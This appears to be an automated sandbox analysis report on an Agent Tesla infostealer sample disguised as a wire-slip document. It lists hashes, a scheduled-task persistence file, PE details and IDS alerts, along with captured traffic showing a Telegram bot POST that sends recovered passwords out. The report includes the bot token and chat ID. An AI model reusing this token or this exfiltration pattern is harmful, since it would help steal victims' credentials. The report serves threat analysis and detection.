SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qemwcahn.ude.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp14C9.tmp

Download File

Process:	C:\Users\user\Desktop\Wire slip account payable.pif.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1572
Entropy (8bit):	5.1171936231131365
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaHxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTAv
MD5:	80A85739E1CD45F1F854EF66BAD3CE81
SHA1:	CA663350F89D88700B0A7D520C89347C095DDE30
SHA-256:	E341FF8A573EEAFCFA15A44FB7FCC7461B67945FD00AAEB06A5DB25C903175A6
SHA-512:	E1A900C45AABC9F1C8395727194AE4FD8D9E5DED1A91C87713DF8E537FF02CC860B0D9D16AABC1401F3637D76BA1B76E367170A6D4048FA7590094CC190FF7EB
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmp25B1.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\EQVRGq.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1572
Entropy (8bit):	5.1171936231131365
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaHxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTAv
MD5:	80A85739E1CD45F1F854EF66BAD3CE81
SHA1:	CA663350F89D88700B0A7D520C89347C095DDE30
SHA-256:	E341FF8A573EEAFCFA15A44FB7FCC7461B67945FD00AAEB06A5DB25C903175A6
SHA-512:	E1A900C45AABC9F1C8395727194AE4FD8D9E5DED1A91C87713DF8E537FF02CC860B0D9D16AABC1401F3637D76BA1B76E367170A6D4048FA7590094CC190FF7EB
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\EQVRGq.exe

Download File

Process:	C:\Users\user\Desktop\Wire slip account payable.pif.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	776200
Entropy (8bit):	7.9363230894425545
Encrypted:	false
SSDEEP:	12288:grOY+Ri3AgFdh1QW4s+HCBhKBSh4/wFgfyYVWmTr6bzoAlHJ35mkR:pQ3Ag/QzsjBgBShKagfJVtv63oArD
MD5:	F3C67CD1BBB9C8A8BCB56EE97C5A7B27
SHA1:	AD3397267ADA55BCA8D547DBB93BC79F40D138CF
SHA-256:	A36C66FB7FDFB2639CC0CCDEAEEF4E6C1A1CD103BA76309ED32777B3F2AB069D
SHA-512:	6BD165450A9007CE4E90A120455BB9FF5914E423E99266CDC854B91AAEA9376C3D54F78AB2EE034597AC90DE74462F9E9E8B74B598E3D5C3B5EDB834DF0F757E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T=g..............0...... .......... ........@.. ....................................`.....................................O.......\|................6........................................................... ............... ..H............text........ ...................... ..`.rsrc...\|...........................@..@.reloc..............................@..B.......................H........6...(...........^...@............................................(......}.....{....r...p .....o5....{....o7...&....0...........{......o9.....}........&.......................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=..............+..E..........\b......2.{....oA...n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...

C:\Users\user\AppData\Roaming\EQVRGq.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Wire slip account payable.pif.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.9363230894425545
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Wire slip account payable.pif.exe
File size:	776'200 bytes
MD5:	f3c67cd1bbb9c8a8bcb56ee97c5a7b27
SHA1:	ad3397267ada55bca8d547dbb93bc79f40d138cf
SHA256:	a36c66fb7fdfb2639cc0ccdeaeef4e6c1a1cd103ba76309ed32777b3f2ab069d
SHA512:	6bd165450a9007ce4e90a120455bb9ff5914e423e99266cdc854b91aaea9376c3d54f78ab2ee034597ac90de74462f9e9e8b74b598e3d5c3b5edb834df0f757e
SSDEEP:	12288:grOY+Ri3AgFdh1QW4s+HCBhKBSh4/wFgfyYVWmTr6bzoAlHJ35mkR:pQ3Ag/QzsjBgBShKagfJVtv63oArD
TLSH:	8DF423A1BE84AB02EB3DA771559F57858B30B922AE2CC0BE445C49D53FD3BD488C119F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T=g..............0...... ........... ........@.. ....................................`................................

File Icon


Icon Hash:	8bdb4b414d656d61

Static PE Info

General

Entrypoint:	0x4b9fee
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x673D54D7 [Wed Nov 20 03:17:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 00:00:00 08/11/2021 23:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add eax, dword ptr [eax]
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax+0000000Eh], al
pushad
add byte ptr [eax], al
adc byte ptr [eax], 00000000h
add byte ptr [eax], al
nop
add byte ptr [eax], al
sbb byte ptr [eax], 00000000h
add byte ptr [eax], al
rol byte ptr [eax], 00000000h
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add dword ptr [eax], eax
add byte ptr [eax], al
dec eax
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
lock add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
jnle 00007F74450587E2h
add byte ptr [eax+00h], bh
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
xor al, 18h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add dword ptr [eax], eax
add byte ptr [eax], al
test al, 00h
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb9f9c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xba000	0x1d7c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xba200	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xbc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb7ff4	0xb8000	97662e2ca187541fbf3dd817bdd05007	False	0.9599184782608695	data	7.942591197199076	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xba000	0x1d7c	0x1e00	e31fdd7674a9227c9d1516a4952ca806	False	0.80625	data	7.3216214464774225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xbc000	0xc	0x200	cf6b6b2e920400c1427579ad96daa38c	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xba100	0x1733	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9151372284896447
RT_GROUP_ICON	0xbb844	0x14	data	1.05
RT_VERSION	0xbb868	0x314	data	0.434010152284264
RT_MANIFEST	0xbbb8c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-21T11:02:11.422015+0100	2851779	ETPRO MALWARE Agent Tesla Telegram Exfil	1	192.168.2.4	49737	149.154.167.220	443	TCP
2024-11-21T11:02:11.422015+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49737	149.154.167.220	443	TCP
2024-11-21T11:02:11.743222+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.4	49737	TCP
2024-11-21T11:02:13.971032+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49740	149.154.167.220	443	TCP
2024-11-21T11:02:14.259420+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.4	49740	TCP
2024-11-21T11:02:14.684700+0100	2851779	ETPRO MALWARE Agent Tesla Telegram Exfil	1	192.168.2.4	49741	149.154.167.220	443	TCP
2024-11-21T11:02:14.684700+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49741	149.154.167.220	443	TCP
2024-11-21T11:02:14.976060+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.4	49741	TCP
2024-11-21T11:02:17.101071+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.4	49742	149.154.167.220	443	TCP
2024-11-21T11:02:17.435516+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.4	49742	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 11:02:06.745538950 CET	49735	80	192.168.2.4	208.95.112.1
Nov 21, 2024 11:02:06.865210056 CET	80	49735	208.95.112.1	192.168.2.4
Nov 21, 2024 11:02:06.865330935 CET	49735	80	192.168.2.4	208.95.112.1
Nov 21, 2024 11:02:06.866050005 CET	49735	80	192.168.2.4	208.95.112.1
Nov 21, 2024 11:02:06.985626936 CET	80	49735	208.95.112.1	192.168.2.4
Nov 21, 2024 11:02:08.058590889 CET	80	49735	208.95.112.1	192.168.2.4
Nov 21, 2024 11:02:08.164324999 CET	49735	80	192.168.2.4	208.95.112.1
Nov 21, 2024 11:02:09.315159082 CET	49737	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:09.315222979 CET	443	49737	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:09.315346003 CET	49737	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:09.372230053 CET	49737	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:09.372272015 CET	443	49737	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:10.777621031 CET	49739	80	192.168.2.4	208.95.112.1
Nov 21, 2024 11:02:10.791990995 CET	443	49737	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:10.792064905 CET	49737	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:10.795469999 CET	49737	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:10.795492887 CET	443	49737	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:10.795938015 CET	443	49737	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:10.897614002 CET	80	49739	208.95.112.1	192.168.2.4
Nov 21, 2024 11:02:10.897722006 CET	49739	80	192.168.2.4	208.95.112.1
Nov 21, 2024 11:02:10.897968054 CET	49739	80	192.168.2.4	208.95.112.1
Nov 21, 2024 11:02:10.899050951 CET	49737	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:10.943339109 CET	443	49737	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:11.017520905 CET	80	49739	208.95.112.1	192.168.2.4
Nov 21, 2024 11:02:11.247750998 CET	49737	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:11.247792006 CET	443	49737	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:11.422024965 CET	443	49737	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:11.481995106 CET	49737	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:11.742743969 CET	443	49737	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:11.743110895 CET	443	49737	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:11.743179083 CET	49737	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:11.763664007 CET	49737	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:11.854248047 CET	49735	80	192.168.2.4	208.95.112.1
Nov 21, 2024 11:02:11.854612112 CET	49740	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:11.854675055 CET	443	49740	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:11.854762077 CET	49740	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:11.855156898 CET	49740	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:11.855175018 CET	443	49740	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:11.974420071 CET	80	49735	208.95.112.1	192.168.2.4
Nov 21, 2024 11:02:11.974630117 CET	49735	80	192.168.2.4	208.95.112.1
Nov 21, 2024 11:02:11.993930101 CET	80	49739	208.95.112.1	192.168.2.4
Nov 21, 2024 11:02:12.044502974 CET	49739	80	192.168.2.4	208.95.112.1
Nov 21, 2024 11:02:12.691004992 CET	49741	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:12.691062927 CET	443	49741	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:12.691168070 CET	49741	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:12.694936991 CET	49741	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:12.694951057 CET	443	49741	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:13.310165882 CET	443	49740	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:13.311726093 CET	49740	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:13.311784029 CET	443	49740	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:13.669595003 CET	49740	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:13.669644117 CET	443	49740	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:13.971039057 CET	443	49740	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:14.013271093 CET	49740	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:14.057862997 CET	443	49741	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:14.057935953 CET	49741	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:14.061353922 CET	49741	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:14.061361074 CET	443	49741	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:14.061619043 CET	443	49741	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:14.106998920 CET	49741	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:14.160310984 CET	49741	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:14.207336903 CET	443	49741	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:14.259047985 CET	443	49740	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:14.259285927 CET	443	49740	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:14.259356022 CET	49740	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:14.259746075 CET	49740	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:14.513396978 CET	49741	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:14.513430119 CET	443	49741	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:14.684706926 CET	443	49741	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:14.731995106 CET	49741	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:14.975847006 CET	443	49741	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:14.975943089 CET	443	49741	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:14.976075888 CET	49741	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:14.976516962 CET	49741	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:15.013113976 CET	49739	80	192.168.2.4	208.95.112.1
Nov 21, 2024 11:02:15.014153957 CET	49742	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:15.014271975 CET	443	49742	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:15.014499903 CET	49742	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:15.014743090 CET	49742	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:15.014781952 CET	443	49742	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:15.133054018 CET	80	49739	208.95.112.1	192.168.2.4
Nov 21, 2024 11:02:15.133147955 CET	49739	80	192.168.2.4	208.95.112.1
Nov 21, 2024 11:02:16.424757957 CET	443	49742	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:16.430874109 CET	49742	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:16.430900097 CET	443	49742	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:16.779340029 CET	49742	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:16.779371023 CET	443	49742	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:17.101075888 CET	443	49742	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:17.153877974 CET	49742	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:17.435324907 CET	443	49742	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:17.435405970 CET	443	49742	149.154.167.220	192.168.2.4
Nov 21, 2024 11:02:17.435486078 CET	49742	443	192.168.2.4	149.154.167.220
Nov 21, 2024 11:02:17.435868979 CET	49742	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 11:02:06.501912117 CET	57937	53	192.168.2.4	1.1.1.1
Nov 21, 2024 11:02:06.728482008 CET	53	57937	1.1.1.1	192.168.2.4
Nov 21, 2024 11:02:09.088274956 CET	61548	53	192.168.2.4	1.1.1.1
Nov 21, 2024 11:02:09.314172983 CET	53	61548	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 21, 2024 11:02:06.501912117 CET	192.168.2.4	1.1.1.1	0xc8a4	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Nov 21, 2024 11:02:09.088274956 CET	192.168.2.4	1.1.1.1	0x10cd	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 21, 2024 11:02:06.728482008 CET	1.1.1.1	192.168.2.4	0xc8a4	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Nov 21, 2024 11:02:09.314172983 CET	1.1.1.1	192.168.2.4	0x10cd	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	208.95.112.1	80	7432	C:\Users\user\Desktop\Wire slip account payable.pif.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 11:02:06.866050005 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Nov 21, 2024 11:02:08.058590889 CET	175	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 10:02:07 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	208.95.112.1	80	7856	C:\Users\user\AppData\Roaming\EQVRGq.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 11:02:10.897968054 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Nov 21, 2024 11:02:11.993930101 CET	175	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 10:02:11 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 56 X-Rl: 43 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	149.154.167.220	443	7432	C:\Users\user\Desktop\Wire slip account payable.pif.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 10:02:10 UTC	260	OUT	POST /bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd09e9a634aff9 Host: api.telegram.org Content-Length: 915 Expect: 100-continue Connection: Keep-Alive
2024-11-21 10:02:11 UTC	915	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 39 65 39 61 36 33 34 61 66 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 36 38 33 31 31 31 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 39 65 39 61 36 33 34 61 66 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 32 31 2f 32 30 32 34 20 30 35 3a 30 32 3a 30 37 0a 55 73 65 72 Data Ascii: -----------------------------8dd09e9a634aff9Content-Disposition: form-data; name="chat_id"5968311109-----------------------------8dd09e9a634aff9Content-Disposition: form-data; name="caption"New PW Recovered!Time: 11/21/2024 05:02:07User
2024-11-21 10:02:11 UTC	25	IN	HTTP/1.1 100 Continue
